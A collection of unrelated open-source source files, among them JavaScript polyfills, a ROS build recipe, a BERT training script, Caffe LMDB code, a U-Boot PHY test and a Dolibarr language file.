theKeys.push(String(i));
}
}
if (isArguments && object.length > 0) {
for (var j = 0; j < object.length; ++j) {
theKeys.push(String(j));
}
} else {
for (var name in object) {
if (!(skipProto && name === 'prototype') && has.call(object, name)) {
theKeys.push(String(name));
}
}
}
if (hasDontEnumBug) {
var skipConstructor = equalsConstructorPrototypeIfNotBuggy(object);
for (var k = 0; k < dontEnums.length; ++k) {
if (!(skipConstructor && dontEnums[k] === 'constructor') && has.call(object, dontEnums[k])) {
theKeys.push(dontEnums[k]);
}
}
}
return theKeys;
};
keysShim.shim = function shimObjectKeys() {
if (Object.keys) {
var keysWorksWithArguments = (function () {
// Safari 5.0 bug
return (Object.keys(arguments) || '').length === 2;
}(1, 2));
if (!keysWorksWithArguments) {
var originalKeys = Object.keys;
Object.keys = function keys(object) {
if (isArgs(object)) {
return originalKeys(slice.call(object));
} else {
return originalKeys(object);
}
};
}
} else {
Object.keys = keysShim;
}
return Object.keys || keysShim;
};
module.exports = keysShim;
},{"./isArguments":10}],10:[function(require,module,exports){
'use strict';
var toStr = Object.prototype.toString;
module.exports = function isArguments(value) {
var str = toStr.call(value);
var isArgs = str === '[object Arguments]';
if (!isArgs) {
isArgs = str !== '[object Array]' &&
value !== null &&
typeof value === 'object' &&
typeof value.length === 'number' &&
value.length >= 0 &&
toStr.call(value.callee) === '[object Function]';
}
return isArgs;
};
},{}],11:[function(require,module,exports){
'use strict';
var implementation = require('./implementation');
var lacksProperEnumerationOrder = function () {
if (!Object.assign) {
return false;
}
// v8, specifically in node 4.x, has a bug with incorrect property enumeration order
// note: this does not detect the bug unless there's 20 characters
var str = 'abcdefghijklmnopqrst';
var letters = str.split('');
var map = {};
for (var i = 0; i < letters.length; ++i) {
map[letters[i]] = letters[i];
}
var obj = Object.assign({}, map);
var actual = '';
for (var k in obj) {
actual += k;
}
return str !== actual;
};
var assignHasPendingExceptions = function () {
if (!Object.assign || !Object.preventExtensions) {
return false;
}
// Firefox 37 still has "pending exception" logic in its Object.assign implementation,
// which is 72% slower than our shim, and Firefox 40's native implementation.
var thrower = Object.preventExtensions({ 1: 2 });
try {
Object.assign(thrower, 'xy');
} catch (e) {
return thrower[1] === 'y';
}
return false;
};
module.exports = function getPolyfill() {
if (!Object.assign) {
return implementation;
}
if (lacksProperEnumerationOrder()) {
return implementation;
}
if (assignHasPendingExceptions()) {
return implementation;
}
return Object.assign;
};
},{"./implementation":2}],12:[function(require,module,exports){
'use strict';
var define = require('define-properties');
var getPolyfill = require('./polyfill');
module.exports = function shimAssign() {
var polyfill = getPolyfill();
define(
Object,
{ assign: polyfill },
{ assign: function () { return Object.assign !== polyfill; } }
);
return polyfill;
};
},{"./polyfill":11,"define-properties":4}]},{},[1]);
| {
"pile_set_name": "Github"
} |
/*
--------------------------------
Infinite Scroll Behavior
Manual / Twitter-style
--------------------------------
+ https://github.com/paulirish/infinitescroll/
+ version 2.0b2.110617
+ Copyright 2011 Paul Irish & Luke Shumard
+ Licensed under the MIT license
+ Documentation: http://infinite-scroll.com/
*/
(function ($, undefined) {
$.extend($.infinitescroll.prototype, {
_setup_twitter: function infscr_setup_twitter() {
var opts = this.options,
instance = this;
$(opts.nextSelector).click(function (e) {
if (e.which == 1 && !e.metaKey && !e.shiftKey) {
e.preventDefault();
instance.retrieve();
}
});
instance.options.loading.start = function (opts) {
//console.log(opts);
$(opts.navSelector).addClass("isLoading");
instance.beginAjax(opts);
};
instance.options.loading.finished = function (opts) {
//$(opts.navSelector).removeClass("isLoading");
};
},
_showdonemsg_twitter: function infscr_showdonemsg_twitter() {
var opts = this.options,
instance = this;
//And also hide the navSelector
//$(opts.navSelector).fadeOut('normal');
// user provided callback when done
opts.errorCallback.call($(opts.contentSelector)[0], 'done');
}
});
})(jQuery);
| {
"pile_set_name": "Github"
} |
# Generated by superflore -- DO NOT EDIT
#
# Copyright Open Source Robotics Foundation
inherit ros_distro_melodic
inherit ros_superflore_generated
DESCRIPTION = "RTAB-Map's standalone library. RTAB-Map is a RGB-D SLAM approach with real-time constraints."
AUTHOR = "Mathieu Labbe <[email protected]>"
ROS_AUTHOR = "Mathieu Labbe"
HOMEPAGE = "http://introlab.github.io/rtabmap"
SECTION = "devel"
LICENSE = "BSD"
LIC_FILES_CHKSUM = "file://package.xml;beginline=8;endline=8;md5=d566ef916e9dedc494f5f793a6690ba5"
ROS_CN = "rtabmap"
ROS_BPN = "rtabmap"
ROS_BUILD_DEPENDS = " \
${ROS_UNRESOLVED_PLATFORM_PKG_libopenni-dev} \
${ROS_UNRESOLVED_PLATFORM_PKG_libvtk-qt} \
${ROS_UNRESOLVED_PLATFORM_PKG_proj} \
cv-bridge \
libfreenect \
libg2o \
octomap \
pcl \
qt-gui-cpp \
sqlite3 \
zlib \
"
ROS_BUILDTOOL_DEPENDS = " \
cmake-native \
"
ROS_EXPORT_DEPENDS = " \
${ROS_UNRESOLVED_PLATFORM_PKG_libopenni-dev} \
${ROS_UNRESOLVED_PLATFORM_PKG_libvtk-qt} \
cv-bridge \
libfreenect \
libg2o \
octomap \
pcl \
qt-gui-cpp \
sqlite3 \
zlib \
"
ROS_BUILDTOOL_EXPORT_DEPENDS = ""
ROS_EXEC_DEPENDS = " \
${ROS_UNRESOLVED_PLATFORM_PKG_libopenni-dev} \
${ROS_UNRESOLVED_PLATFORM_PKG_libvtk-qt} \
cv-bridge \
libfreenect \
libg2o \
octomap \
pcl \
qt-gui-cpp \
sqlite3 \
zlib \
"
# Currently informational only -- see http://www.ros.org/reps/rep-0149.html#dependency-tags.
ROS_TEST_DEPENDS = ""
DEPENDS = "${ROS_BUILD_DEPENDS} ${ROS_BUILDTOOL_DEPENDS}"
# Bitbake doesn't support the "export" concept, so build them as if we needed them to build this package (even though we actually
# don't) so that they're guaranteed to have been staged should this package appear in another's DEPENDS.
DEPENDS += "${ROS_EXPORT_DEPENDS} ${ROS_BUILDTOOL_EXPORT_DEPENDS}"
RDEPENDS_${PN} += "${ROS_EXEC_DEPENDS}"
# matches with: https://github.com/introlab/rtabmap-release/archive/release/melodic/rtabmap/0.20.0-2.tar.gz
ROS_BRANCH ?= "branch=release/melodic/rtabmap"
SRC_URI = "git://github.com/introlab/rtabmap-release;${ROS_BRANCH};protocol=https"
SRCREV = "b1d90d0a3889d11ab9b75a88bff2514e2b1b5fb9"
S = "${WORKDIR}/git"
ROS_BUILD_TYPE = "cmake"
inherit ros_${ROS_BUILD_TYPE}
| {
"pile_set_name": "Github"
} |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
import logging
import argparse
import random
from tqdm import tqdm, trange
import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler
from torch.utils.data.distributed import DistributedSampler
from pytorch_pretrained_bert.tokenization import BertTokenizer
from pytorch_pretrained_bert.optimization import BertAdam
from pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE
try:
from sequential_sentence_selector.modeling_sequential_sentence_selector import BertForSequentialSentenceSelector
except:
from modeling_sequential_sentence_selector import BertForSequentialSentenceSelector
import json
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, q, a, t, c, sf):
self.guid = guid
self.question = q
self.answer = a
self.titles = t
self.context = c
self.supporting_facts = sf
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_masks, segment_ids, target_ids, output_masks, num_sents, num_sfs, ex_index):
self.input_ids = input_ids
self.input_masks = input_masks
self.segment_ids = segment_ids
self.target_ids = target_ids
self.output_masks = output_masks
self.num_sents = num_sents
self.num_sfs = num_sfs
self.ex_index = ex_index
class DataProcessor:
def get_train_examples(self, file_name):
return self.create_examples(json.load(open(file_name, 'r')))
def create_examples(self, jsn):
examples = []
max_sent_num = 0
for data in jsn:
guid = data['q_id']
question = data['question']
titles = data['titles']
context = data['context'] # {title: [s1, s2, ...]}
# {title: [index1, index2, ...]}
supporting_facts = data['supporting_facts']
max_sent_num = max(max_sent_num, sum(
[len(context[title]) for title in context]))
examples.append(InputExample(
guid, question, data['answer'], titles, context, supporting_facts))
return examples
def convert_examples_to_features(examples, max_seq_length, max_sent_num, max_sf_num, tokenizer, train=False):
"""Loads a data file into a list of `InputBatch`s."""
DUMMY = [0] * max_seq_length
DUMMY_ = [0.0] * max_sent_num
features = []
logger.info('#### Constructing features... ####')
for (ex_index, example) in enumerate(tqdm(examples, desc='Example')):
tokens_q = tokenizer.tokenize(
'Q: {} A: {}'.format(example.question, example.answer))
tokens_q = ['[CLS]'] + tokens_q + ['[SEP]']
input_ids = []
input_masks = []
segment_ids = []
for title in example.titles:
sents = example.context[title]
for (i, s) in enumerate(sents):
if len(input_ids) == max_sent_num:
break
tokens_s = tokenizer.tokenize(
s)[:max_seq_length-len(tokens_q)-1]
tokens_s = tokens_s + ['[SEP]']
padding = [0] * (max_seq_length -
len(tokens_s) - len(tokens_q))
input_ids_ = tokenizer.convert_tokens_to_ids(
tokens_q + tokens_s)
input_masks_ = [1] * len(input_ids_)
segment_ids_ = [0] * len(tokens_q) + [1] * len(tokens_s)
input_ids_ += padding
input_ids.append(input_ids_)
input_masks_ += padding
input_masks.append(input_masks_)
segment_ids_ += padding
segment_ids.append(segment_ids_)
assert len(input_ids_) == max_seq_length
assert len(input_masks_) == max_seq_length
assert len(segment_ids_) == max_seq_length
target_ids = []
target_offset = 0
for title in example.titles:
sfs = example.supporting_facts[title]
for i in sfs:
if i < len(example.context[title]) and i+target_offset < len(input_ids):
target_ids.append(i+target_offset)
else:
logger.warning('')
logger.warning('Invalid annotation: {}'.format(sfs))
logger.warning('Invalid annotation: {}'.format(
example.context[title]))
target_offset += len(example.context[title])
assert len(input_ids) <= max_sent_num
assert len(target_ids) <= max_sf_num
num_sents = len(input_ids)
num_sfs = len(target_ids)
output_masks = [([1.0] * len(input_ids) + [0.0] * (max_sent_num -
len(input_ids) + 1)) for _ in range(max_sent_num + 2)]
if train:
for i in range(len(target_ids)):
for j in range(len(target_ids)):
if i == j:
continue
output_masks[i][target_ids[j]] = 0.0
for i in range(len(output_masks)):
if i >= num_sfs+1:
for j in range(len(output_masks[i])):
output_masks[i][j] = 0.0
else:
for i in range(len(input_ids)):
output_masks[i+1][i] = 0.0
target_ids += [0] * (max_sf_num - len(target_ids))
padding = [DUMMY] * (max_sent_num - len(input_ids))
input_ids += padding
input_masks += padding
segment_ids += padding
features.append(
InputFeatures(input_ids=input_ids,
input_masks=input_masks,
segment_ids=segment_ids,
target_ids=target_ids,
output_masks=output_masks,
num_sents=num_sents,
num_sfs=num_sfs,
ex_index=ex_index))
logger.info('Done!')
return features
def warmup_linear(x, warmup=0.002):
if x < warmup:
return x/warmup
return 1.0 - x
def main():
parser = argparse.ArgumentParser()
## Required parameters
parser.add_argument("--bert_model", default=None, type=str, required=True,
help="Bert pre-trained model selected in the list: bert-base-uncased, "
"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, "
"bert-base-multilingual-cased, bert-base-chinese.")
parser.add_argument("--output_dir",
default=None,
type=str,
required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--train_file_path",
type=str,
default=None,
required=True,
help="File path to training data")
## Other parameters
parser.add_argument("--max_seq_length",
default=256,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--max_sent_num",
default=30,
type=int)
parser.add_argument("--max_sf_num",
default=15,
type=int)
parser.add_argument("--do_lower_case",
action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--train_batch_size",
default=1,
type=int,
help="Total batch size for training.")
parser.add_argument("--eval_batch_size",
default=5,
type=int,
help="Total batch size for eval.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam. (def: 5e-5)")
parser.add_argument("--num_train_epochs",
default=5.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
parser.add_argument("--no_cuda",
action='store_true',
help="Whether not to use CUDA when available")
parser.add_argument('--seed',
type=int,
default=42,
help="random seed for initialization")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
args = parser.parse_args()
cpu = torch.device('cpu')
device = torch.device("cuda" if torch.cuda.is_available()
and not args.no_cuda else "cpu")
n_gpu = torch.cuda.device_count()
args.train_batch_size = int(
args.train_batch_size / args.gradient_accumulation_steps)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
if os.path.exists(args.output_dir) and os.listdir(args.output_dir):
raise ValueError(
"Output directory ({}) already exists and is not empty.".format(args.output_dir))
os.makedirs(args.output_dir, exist_ok=True)
processor = DataProcessor()
# Prepare model
if args.bert_model != 'bert-large-uncased-whole-word-masking':
tokenizer = BertTokenizer.from_pretrained(
args.bert_model, do_lower_case=args.do_lower_case)
model = BertForSequentialSentenceSelector.from_pretrained(args.bert_model,
cache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(-1))
else:
model = BertForSequentialSentenceSelector.from_pretrained('bert-large-uncased',
cache_dir=PYTORCH_PRETRAINED_BERT_CACHE / 'distributed_{}'.format(-1))
from utils import get_bert_model_from_pytorch_transformers
state_dict, vocab_file = get_bert_model_from_pytorch_transformers(
args.bert_model)
model.bert.load_state_dict(state_dict)
tokenizer = BertTokenizer.from_pretrained(
vocab_file, do_lower_case=args.do_lower_case)
logger.info(
'The {} model is successfully loaded!'.format(args.bert_model))
model.to(device)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
global_step = 0
nb_tr_steps = 0
tr_loss = 0
POSITIVE = 1.0
NEGATIVE = 0.0
# Load training examples
train_examples = None
num_train_steps = None
train_examples = processor.get_train_examples(args.train_file_path)
train_features = convert_examples_to_features(
train_examples, args.max_seq_length, args.max_sent_num, args.max_sf_num, tokenizer, train=True)
num_train_steps = int(
len(train_features) / args.train_batch_size / args.gradient_accumulation_steps * args.num_train_epochs)
# Prepare optimizer
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(
nd in n for nd in no_decay)], 'weight_decay': 0.01},
{'params': [p for n, p in param_optimizer if any(
nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
t_total = num_train_steps
optimizer = BertAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
warmup=args.warmup_proportion,
t_total=t_total,
max_grad_norm=1.0)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_features))
logger.info(" Batch size = %d", args.train_batch_size)
logger.info(" Num steps = %d", num_train_steps)
all_input_ids = torch.tensor(
[f.input_ids for f in train_features], dtype=torch.long)
all_input_masks = torch.tensor(
[f.input_masks for f in train_features], dtype=torch.long)
all_segment_ids = torch.tensor(
[f.segment_ids for f in train_features], dtype=torch.long)
all_target_ids = torch.tensor(
[f.target_ids for f in train_features], dtype=torch.long)
all_output_masks = torch.tensor(
[f.output_masks for f in train_features], dtype=torch.float)
all_num_sents = torch.tensor(
[f.num_sents for f in train_features], dtype=torch.long)
all_num_sfs = torch.tensor(
[f.num_sfs for f in train_features], dtype=torch.long)
train_data = TensorDataset(all_input_ids,
all_input_masks,
all_segment_ids,
all_target_ids,
all_output_masks,
all_num_sents,
all_num_sfs)
train_sampler = RandomSampler(train_data)
train_dataloader = DataLoader(
train_data, sampler=train_sampler, batch_size=args.train_batch_size)
model.train()
epc = 0
for _ in trange(int(args.num_train_epochs), desc="Epoch"):
tr_loss = 0
nb_tr_examples, nb_tr_steps = 0, 0
for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
input_masks = batch[1]
batch_max_len = input_masks.sum(dim=2).max().item()
target_ids = batch[3]
num_sents = batch[5]
batch_max_sent_num = num_sents.max().item()
num_sfs = batch[6]
batch_max_sf_num = num_sfs.max().item()
output_masks_cpu = (batch[4])[
:, :batch_max_sf_num+1, :batch_max_sent_num+1]
batch = tuple(t.to(device) for t in batch)
input_ids, input_masks, segment_ids, _, output_masks, __, ___ = batch
B = input_ids.size(0)
input_ids = input_ids[:, :batch_max_sent_num, :batch_max_len]
input_masks = input_masks[:, :batch_max_sent_num, :batch_max_len]
segment_ids = segment_ids[:, :batch_max_sent_num, :batch_max_len]
target_ids = target_ids[:, :batch_max_sf_num]
# 1 for EOE
output_masks = output_masks[:,
:batch_max_sf_num+1, :batch_max_sent_num+1]
target = torch.FloatTensor(output_masks.size()).fill_(
NEGATIVE) # (B, NUM_STEPS, |S|+1) <- 1 for EOE
for i in range(B):
output_masks[i, :num_sfs[i]+1, -1] = 1.0 # for EOE
target[i, num_sfs[i], -1].fill_(POSITIVE)
for j in range(num_sfs[i].item()):
target[i, j, target_ids[i, j]].fill_(POSITIVE)
target = target.to(device)
loss = model(input_ids, segment_ids, input_masks,
output_masks, target, target_ids, batch_max_sf_num)
if n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu.
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
loss.backward()
tr_loss += loss.item()
nb_tr_examples += B
nb_tr_steps += 1
if (step + 1) % args.gradient_accumulation_steps == 0:
# modify learning rate with special warm up BERT uses
lr_this_step = args.learning_rate * \
warmup_linear(global_step/t_total, args.warmup_proportion)
for param_group in optimizer.param_groups:
param_group['lr'] = lr_this_step
optimizer.step()
optimizer.zero_grad()
global_step += 1
model_to_save = model.module if hasattr(
model, 'module') else model # Only save the model it-self
output_model_file = os.path.join(
args.output_dir, "pytorch_model_"+str(epc+1)+".bin")
torch.save(model_to_save.state_dict(), output_model_file)
epc += 1
if __name__ == "__main__":
main()
| {
"pile_set_name": "Github"
} |
#ifndef _CONTROLS_H__
#define _CONTROLS_H__ 1
void controls_show(Evas_Object *win, Evas_Object *base, Evas_Object *bg,
Evas_Object *term,
void (*donecb) (void *data), void *donedata);
void controls_init(void);
void controls_shutdown(void);
#endif
| {
"pile_set_name": "Github"
} |
<?php
/**
* User: shenzhe
* Date: 2014/2/7
*
* 内置route
*/
namespace ZPHP\Socket\Route;
use ZPHP\Protocol;
use ZPHP\Core;
class ZRpack
{
public function run($data, $fd)
{
$server = Protocol\Factory::getInstance('ZRpack');
$server->setFd($fd);
$result = array();
if (false === $server->parse($data)) {
return $result;
}
$result[] = Core\Route::route($server);
while ($server->parse("")) {
$result[] = Core\Route::route($server);
}
return $result;
}
}
| {
"pile_set_name": "Github"
} |
#ifdef USE_LMDB
#include "caffe/util/db_lmdb.hpp"
#include <sys/stat.h>
#include <string>
namespace caffe { namespace db {
void LMDB::Open(const string& source, Mode mode) {
MDB_CHECK(mdb_env_create(&mdb_env_));
if (mode == NEW) {
CHECK_EQ(mkdir(source.c_str(), 0744), 0) << "mkdir " << source << " failed";
}
int flags = 0;
if (mode == READ) {
flags = MDB_RDONLY | MDB_NOTLS;
}
int rc = mdb_env_open(mdb_env_, source.c_str(), flags, 0664);
#ifndef ALLOW_LMDB_NOLOCK
MDB_CHECK(rc);
#else
if (rc == EACCES) {
LOG(WARNING) << "Permission denied. Trying with MDB_NOLOCK ...";
// Close and re-open environment handle
mdb_env_close(mdb_env_);
MDB_CHECK(mdb_env_create(&mdb_env_));
// Try again with MDB_NOLOCK
flags |= MDB_NOLOCK;
MDB_CHECK(mdb_env_open(mdb_env_, source.c_str(), flags, 0664));
} else {
MDB_CHECK(rc);
}
#endif
LOG(INFO) << "Opened lmdb " << source;
}
LMDBCursor* LMDB::NewCursor() {
MDB_txn* mdb_txn;
MDB_cursor* mdb_cursor;
MDB_CHECK(mdb_txn_begin(mdb_env_, NULL, MDB_RDONLY, &mdb_txn));
MDB_CHECK(mdb_dbi_open(mdb_txn, NULL, 0, &mdb_dbi_));
MDB_CHECK(mdb_cursor_open(mdb_txn, mdb_dbi_, &mdb_cursor));
return new LMDBCursor(mdb_txn, mdb_cursor);
}
LMDBTransaction* LMDB::NewTransaction() {
return new LMDBTransaction(mdb_env_);
}
void LMDBTransaction::Put(const string& key, const string& value) {
keys.push_back(key);
values.push_back(value);
}
void LMDBTransaction::Commit() {
MDB_dbi mdb_dbi;
MDB_val mdb_key, mdb_data;
MDB_txn *mdb_txn;
// Initialize MDB variables
MDB_CHECK(mdb_txn_begin(mdb_env_, NULL, 0, &mdb_txn));
MDB_CHECK(mdb_dbi_open(mdb_txn, NULL, 0, &mdb_dbi));
bool out_of_memory = false;
for (int i = 0; i < keys.size(); i++) {
mdb_key.mv_size = keys[i].size();
mdb_key.mv_data = const_cast<char*>(keys[i].data());
mdb_data.mv_size = values[i].size();
mdb_data.mv_data = const_cast<char*>(values[i].data());
int put_rc = mdb_put(mdb_txn, mdb_dbi, &mdb_key, &mdb_data, 0);
if (put_rc == MDB_MAP_FULL) {
out_of_memory = true;
break;
} else {
// Failed for some other reason
MDB_CHECK(put_rc);
}
}
if (!out_of_memory) {
// Commit the transaction
MDB_CHECK(mdb_txn_commit(mdb_txn));
mdb_dbi_close(mdb_env_, mdb_dbi);
keys.clear();
values.clear();
} else {
// Double the map size and retry
mdb_txn_abort(mdb_txn);
mdb_dbi_close(mdb_env_, mdb_dbi);
DoubleMapSize();
Commit();
}
}
void LMDBTransaction::DoubleMapSize() {
struct MDB_envinfo current_info;
MDB_CHECK(mdb_env_info(mdb_env_, ¤t_info));
size_t new_size = current_info.me_mapsize * 2;
DLOG(INFO) << "Doubling LMDB map size to " << (new_size>>20) << "MB ...";
MDB_CHECK(mdb_env_set_mapsize(mdb_env_, new_size));
}
} // namespace db
} // namespace caffe
#endif // USE_LMDB
| {
"pile_set_name": "Github"
} |
package com.my.blog.website.dto;
import com.my.blog.website.modal.Vo.MetaVo;
public class MetaDto extends MetaVo {
private int count;
public int getCount() {
return count;
}
public void setCount(int count) {
this.count = count;
}
}
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0+
/*
* Copyright (C) 2017 Texas Instruments Incorporated - http://www.ti.com/
* Written by Jean-Jacques Hiblot <[email protected]>
*/
#include <common.h>
#include <dm.h>
#include <generic-phy.h>
#include <dm/test.h>
#include <test/ut.h>
/* Base test of the phy uclass */
static int dm_test_phy_base(struct unit_test_state *uts)
{
struct udevice *dev;
struct phy phy1_method1;
struct phy phy1_method2;
struct phy phy2;
struct phy phy3;
struct udevice *parent;
/* Get the device using the phy device*/
ut_assertok(uclass_get_device_by_name(UCLASS_SIMPLE_BUS,
"gen_phy_user", &parent));
/*
* Get the same phy port in 2 different ways and compare.
*/
	ut_assertok(generic_phy_get_by_name(parent, "phy1", &phy1_method1));
	ut_assertok(generic_phy_get_by_index(parent, 0, &phy1_method2));
ut_asserteq(phy1_method1.id, phy1_method2.id);
/*
* Get the second phy port. Check that the same phy provider (device)
* provides this 2nd phy port, but that the IDs are different
*/
	ut_assertok(generic_phy_get_by_name(parent, "phy2", &phy2));
ut_asserteq_ptr(phy1_method2.dev, phy2.dev);
ut_assert(phy1_method1.id != phy2.id);
/*
* Get the third phy port. Check that the phy provider is different
*/
	ut_assertok(generic_phy_get_by_name(parent, "phy3", &phy3));
ut_assert(phy2.dev != phy3.dev);
/* Try to get a non-existing phy */
ut_asserteq(-ENODEV, uclass_get_device(UCLASS_PHY, 3, &dev));
ut_asserteq(-ENODATA, generic_phy_get_by_name(parent,
"phy_not_existing", &phy1_method1));
return 0;
}
DM_TEST(dm_test_phy_base, DM_TESTF_SCAN_PDATA | DM_TESTF_SCAN_FDT);
/* Test of the phy uclass using the sandbox phy driver operations */
static int dm_test_phy_ops(struct unit_test_state *uts)
{
struct phy phy1;
struct phy phy2;
struct phy phy3;
struct udevice *parent;
ut_assertok(uclass_get_device_by_name(UCLASS_SIMPLE_BUS,
"gen_phy_user", &parent));
ut_assertok(generic_phy_get_by_name(parent, "phy1", &phy1));
ut_asserteq(0, phy1.id);
ut_assertok(generic_phy_get_by_name(parent, "phy2", &phy2));
ut_asserteq(1, phy2.id);
ut_assertok(generic_phy_get_by_name(parent, "phy3", &phy3));
ut_asserteq(0, phy3.id);
/* test normal operations */
ut_assertok(generic_phy_init(&phy1));
ut_assertok(generic_phy_power_on(&phy1));
ut_assertok(generic_phy_power_off(&phy1));
/*
* test operations after exit().
* The sandbox phy driver does not allow it.
*/
ut_assertok(generic_phy_exit(&phy1));
ut_assert(generic_phy_power_on(&phy1) != 0);
ut_assert(generic_phy_power_off(&phy1) != 0);
/*
* test normal operations again (after re-init)
*/
ut_assertok(generic_phy_init(&phy1));
ut_assertok(generic_phy_power_on(&phy1));
ut_assertok(generic_phy_power_off(&phy1));
/*
* test calling unimplemented feature.
* The call is expected to succeed
*/
ut_assertok(generic_phy_reset(&phy1));
/* PHY2 has a known problem with power off */
ut_assertok(generic_phy_init(&phy2));
ut_assertok(generic_phy_power_on(&phy2));
ut_asserteq(-EIO, generic_phy_power_off(&phy2));
/* PHY3 has a known problem with power off and power on */
ut_assertok(generic_phy_init(&phy3));
ut_asserteq(-EIO, generic_phy_power_off(&phy3));
	ut_asserteq(-EIO, generic_phy_power_on(&phy3));
return 0;
}
DM_TEST(dm_test_phy_ops, DM_TESTF_SCAN_PDATA | DM_TESTF_SCAN_FDT);
| {
"pile_set_name": "Github"
} |
# Dolibarr language file - Source file is en_US - exports
ExportsArea=Exports
ImportArea=Import
NewExport=New Export
NewImport=New Import
ExportableDatas=Exportable dataset
ImportableDatas=Importable dataset
SelectExportDataSet=Choose dataset you want to export...
SelectImportDataSet=Choose dataset you want to import...
SelectExportFields=Choose the fields you want to export, or select a predefined export profile
SelectImportFields=Choose the source file fields you want to import and their target field in database by moving them up and down with anchor %s, or select a predefined import profile:
NotImportedFields=Fields of source file not imported
SaveExportModel=Save your selections as an export profile/template (for reuse).
SaveImportModel=Save this import profile (for reuse) ...
ExportModelName=Export profile name
ExportModelSaved=Export profile saved as <b>%s</b>.
ExportableFields=Exportable fields
ExportedFields=Exported fields
ImportModelName=Import profile name
ImportModelSaved=Import profile saved as <b>%s</b>.
DatasetToExport=Dataset to export
DatasetToImport=Import file into dataset
ChooseFieldsOrdersAndTitle=Choose fields order...
FieldsTitle=Fields title
FieldTitle=Field title
NowClickToGenerateToBuildExportFile=Now, select the file format in the combo box and click on "Generate" to build the export file...
AvailableFormats=Available Formats
LibraryShort=Library
ExportCsvSeparator=CSV character separator
ImportCsvSeparator=CSV character separator
Step=Step
FormatedImport=Import Assistant
FormatedImportDesc1=This module allows you to update existing data or add new objects into the database from a file without technical knowledge, using an assistant.
FormatedImportDesc2=First step is to choose the kind of data you want to import, then the format of the source file, then the fields you want to import.
FormatedExport=Export Assistant
FormatedExportDesc1=These tools allow the export of personalized data using an assistant, to help you in the process without requiring technical knowledge.
FormatedExportDesc2=First step is to choose a predefined dataset, then which fields you want to export, and in which order.
FormatedExportDesc3=When data to export are selected, you can choose the format of the output file.
Sheet=Sheet
NoImportableData=No importable data (no module with definitions to allow data imports)
FileSuccessfullyBuilt=File generated
SQLUsedForExport=SQL Request used to extract data
LineId=Id of line
LineLabel=Label of line
LineDescription=Description of line
LineUnitPrice=Unit price of line
LineVATRate=VAT Rate of line
LineQty=Quantity for line
LineTotalHT=Amount excl. tax for line
LineTotalTTC=Amount with tax for line
LineTotalVAT=Amount of VAT for line
TypeOfLineServiceOrProduct=Type of line (0=product, 1=service)
FileWithDataToImport=File with data to import
FileToImport=Source file to import
FileMustHaveOneOfFollowingFormat=File to import must have one of following formats
DownloadEmptyExample=Download template file with field content information (* are mandatory fields)
ChooseFormatOfFileToImport=Choose the file format to use as import file format by clicking on the %s icon to select it...
ChooseFileToImport=Upload file then click on the %s icon to select file as source import file...
SourceFileFormat=Source file format
FieldsInSourceFile=Fields in source file
FieldsInTargetDatabase=Target fields in Dolibarr database (bold=mandatory)
Field=Field
NoFields=No fields
MoveField=Move field column number %s
ExampleOfImportFile=Example_of_import_file
SaveImportProfile=Save this import profile
ErrorImportDuplicateProfil=Failed to save this import profile with this name. An existing profile already exists with this name.
TablesTarget=Targeted tables
FieldsTarget=Targeted fields
FieldTarget=Targeted field
FieldSource=Source field
NbOfSourceLines=Number of lines in source file
NowClickToTestTheImport=Check that the file format (field and string delimiters) of your file matches the options shown and that you have omitted the header line, or these will be flagged as errors in the following simulation.<br>Click on the "<b>%s</b>" button to run a check of the file structure/contents and simulate the import process.<br><b>No data will be changed in your database</b>.
RunSimulateImportFile=Run Import Simulation
FieldNeedSource=This field requires data from the source file
SomeMandatoryFieldHaveNoSource=Some mandatory fields have no source from data file
InformationOnSourceFile=Information on source file
InformationOnTargetTables=Information on target fields
SelectAtLeastOneField=Switch at least one source field in the column of fields to export
SelectFormat=Choose this import file format
RunImportFile=Import Data
NowClickToRunTheImport=Check the results of the import simulation. Correct any errors and re-test.<br>When the simulation reports no errors you may proceed to import the data into the database.
DataLoadedWithId=The imported data will have an additional field in each database table with this import id: <b>%s</b>, to allow it to be searchable in the case of investigating a problem related to this import.
ErrorMissingMandatoryValue=Mandatory data is empty in the source file for field <b>%s</b>.
TooMuchErrors=There are still <b>%s</b> other source lines with errors but output has been limited.
TooMuchWarnings=There are still <b>%s</b> other source lines with warnings but output has been limited.
EmptyLine=Empty line (will be discarded)
CorrectErrorBeforeRunningImport=You <b>must</b> correct all errors <b>before</b> running the definitive import.
FileWasImported=File was imported with number <b>%s</b>.
